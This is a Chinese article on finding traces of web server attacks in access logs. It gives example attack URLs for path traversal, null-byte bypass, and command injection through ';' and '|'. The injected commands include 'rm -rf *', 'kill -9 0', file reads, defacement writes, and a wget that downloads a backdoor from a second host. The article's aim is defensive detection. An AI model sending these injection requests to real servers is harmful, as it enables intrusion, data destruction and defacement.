频道栏目
首页 > 资讯 > 网络安全 > 正文

教您WEB服务被攻击后痕迹的检测

09-12-25        来源:[db:作者]  
收藏   我要投稿
web站点默认80为服务端口,关于它的各种安全问题不断的发布出来,这些漏洞中一些甚至允许攻击者获得系统管理员的权限进入站点内部,以下是Zenomorph对一些80端口攻击方式的痕迹的研究,和告诉你怎样从日志记录中发现问题。
  详细描述
  下面部分通过一些列子,展示对web服务器和其上的应用程序普遍的攻击,和其留下的痕迹,这些列子仅仅是代表了主要的攻击方式,并没有列出所有的攻击形式,这部分将详细描述每种攻击的作用,和其怎样利用这些漏洞进行攻击。
  (1)"." ".." 和 "..." 请求
  这些攻击痕迹是非常普遍的用于web应用程序和web服务器,它用于允许攻击者或者蠕虫病毒程序改变web服务器的路径,获得访问非公开的区域。大多数的CGI程序漏洞含有这些".."请求。
  Example:
  http://bbs.xdadmin.com/cgi-bin/lame.cgi?file=../../../../etc/motd
  这个列子展示了攻击者请求mosd这个文件,如果攻击者有能力突破web服务器根目录,那么可以获得更多的信息,并进一步的获得特权。
  (2)"%20" 请求
  %20是表示空格的16进制数值,虽然这个并不代表你能够利用什么,但是在你浏览日志的时候会发现它,一些web服务器上运行的应用程序中这个字符可能会被有效的执行,所以,你应该仔细的查看日志。另一方面,这个请求有时可以帮助执行一些命令。
  Example:
  http://bbs.xdadmin.com/cgi-bin/lame.cgi?page=ls%20-al
  这个列子展示了攻击者执行了一个unix的命令,列出请求的整个目录的文件,导致攻击者访问你系统中重要的文件,帮助他进一步取得特权提供条件。
  (3)"%00" 请求
  %00表示16进制的空字节,他能够用于愚弄web应用程序,并请求不同类型的文件。
  Examples:
  http://bbs.xdadmin.com/cgi-bin/lame.cgi?page=index.html
  这可能是个有效的请求在这个机子上,如果攻击者注意到这个请求动作成功,他会进一步寻找这个cgi程序的问题。
  http://bbs.xdadmin.com/cgi-bin/lame.cgi?page=../../../../etc/motd
  也许这个cgi程序不接受这个请求,原因在于它要检查这个请求文件的后缀名,如:html.shtml或者其他类型的文件。大多数的程序会告诉你所请求的文件类型无效,这个时候它会告诉攻击者请求的文件必须是一某个字符后缀的文件类型,这样,攻击者可以获得系统的路径,文件名,导致在你的系统获得更多的敏感信息
  http://bbs.xdadmin.com/cgi-bin/l ... /../etc/motd%00html
  注意这个请求,它将骗取cgi程序认为这个文件是个确定的可接受的文件类型,一些应用程序由于愚蠢的检查有效的请求文件,这是攻击者常用的方法。
    (4)"│" 请求
  这是个管道字符,在unix系统用于帮助在一个请求中同时执行多个系统命令。
  Example:
  # cat access_log│ grep -i ".."
  (这个命令将显示日志中的“..“请求,常用于发现攻击者和蠕虫攻击)
  常可以看到有很多web应用程序用这个字符,这也导致IDS日志中错误的报警。
  在你的程序仔细的检查中,这样是有好处的,可以降低错误的警报在入侵检测系统中。
  下面给出一些列子:
  http://bbs.xdadmin.com/cgi-bin/lame.cgi?page=../../../../bin/ls
  这个请求命令执行,下面是一些变化的列子
  http://bbs.xdadmin.com/cgi-bin/l ... bin/ls%20-al%20/etc│
  这个请求在unix系统中列出/etc目录的所有文件
  http://bbs.xdadmin.com/cgi-bin/lame.cgi?page=cat%20access_log│grep%20-i%20"lame"
  这个请求cat命令的执行并且grep命令也将执行,查询出”lame"
  (5)";" 请求
  在unix系统,这个字符允许多个命令在一行执行
  Example:
  # id;uname -a
  (执行id命令后,紧跟着执行uname命令)
  一些web程序用这个字符,可能导致在你的IDS日志中失败的警告,你应该仔细的检查你的web程序,让你的IDS警报失败的几率降低。
  (6)"<" 和 ">" 请求
  应该检查你的日志记录中这两个字符,众多的原因中,首要的一个是这个字符表明了添加数据在文件中
  Example 1:
  # echo "your hax0red h0 h0" >> /etc/motd (请求写信息在motd这个文件中)
  一个攻击者可以容易的用象上面的这个请求篡改你的web页面。比如著名的RDS exploit常被攻击者用于更改web主页面。
  Example 2:
  http://bbs.xdadmin.com/something.php=<b>Hi%20mom%20Im%20Bold!</b>
  你会注意到这里html语言的标志,他同样用了“〈”,“〉”字符,这种攻击不能导致攻击者对系统进行访问,它迷惑人们认为这是个合法的信息在web站点中(导致人们在访问这个联结的时候访问到攻击者设定的地址,这种请求可能会被转变成16进制的编码字符形式,使攻击的痕迹不那么明显)
  (7)"!"请求
  这种字符请求常用语对SS(Server Side Include) I进行攻击,如果攻击者迷惑用户点击被攻击者设定的联结,和上面的一样。
  Example:
  http://bbs.xdadmin.com1/something.php=<!%20--#include%20virtual="http://bbs.xdadmin.com2
/fake-article.html"-->
  这个列子是攻击者可能会做的,它让一个bbs.xdadmin.com2站点上的文件看起来是来自于 bbs.xdadmin.com1上面的(当然,需要访问者访问这个被攻击者设定的联结。这种请求可能被转化成16进制的编码伪装,不易发现)
  同时,这种方式也可以以web站点的权限执行命令
  Example:
  <A href=’http://bbs.xdadmin.com/something.php="/bin/rm"
  这个命令可以删除文件,如果不正确的使用是非常危险的
  Examples:
  http://bbs.xdadmin.com/cgi-bin/b ... /../bin/rm%20-rf%20*│
  http://bbs.xdadmin.com/cgi-bin/bad.cgi?doh=rm%20-rf%20*;
  "wget and tftp" 命令
  这些命令常被攻击者用来下载可能进一步获得特权的文件,wget是unix下的命令,可能被用来下载后门程序,tftp是unix和nt下的命令,用来下载文件。一些IIS蠕虫通过tftp来复制自身传播病毒到其他的主机
  Examples:
  http://bbs.xdadmin.com/cgi-bin/b ... h/to-wget/wget%20ht
tp://bbs.xdadmin.com2/Phantasmp.c│
http://bbs.xdadmin.com/cgi-bin/b ... wa-security.net/Pha
ntasmp.c;
  "cat" 命令
  这个命令用来查看文件内容,常用来读重要的信息,比如配置文件,密码文件,信用卡文件和你能够想到的文件
  Examples:
http://bbs.xdadmin.com/cgi-bin/b ... bin/cat%20/etc/motd│
http://bbs.xdadmin.com/cgi-bin/bad.cgi?doh=cat%20/etc/motd;
  "echo" 命令
  这个命令常用于写数据到文件中,比如“index.html”
  Examples:
http://bbs.xdadmin.com/cgi-bin/b ... ./../../bin/echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt│
>%200day.txt>http://bbs.xdadmin.com/cgi-bin/bad.cgi?doh=echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt;
"ps" 命令
  列出当前运行的进程,告诉攻击者远程主机运行了那些软件,以便从中得到一些安全问题的主意,获得进一步的权限
  Examples:
http://bbs.xdadmin.com/cgi-bin/b ... ../../bin/ps%20-aux│
http://bbs.xdadmin.com/cgi-bin/bad.cgi?doh=ps%20-aux;
  "kill and killall" 命令
  在unix系统这个命令用于杀掉进程,一个攻击者可以用这个命令来停止系统服务和程序,同时可以擦掉攻击者的痕迹,一些exploit会产生很多的子进程
  Examples: http://bbs.xdadmin.com/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200
http://bbs.xdadmin.com/cgi-bin/bad.cgi?doh=kill%20-9%200;
  "uname" 命令
  这个命令告诉攻击者远程机器的名字,一些时候,通过这个命令知道web站点位于哪个isp,也许是攻击者曾今访问过
相关TAG标签
上一篇:用VC生成最小的EXE文件
下一篇:Serv-u提权脚本ASp版最新修正可回显结果并反复执行
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站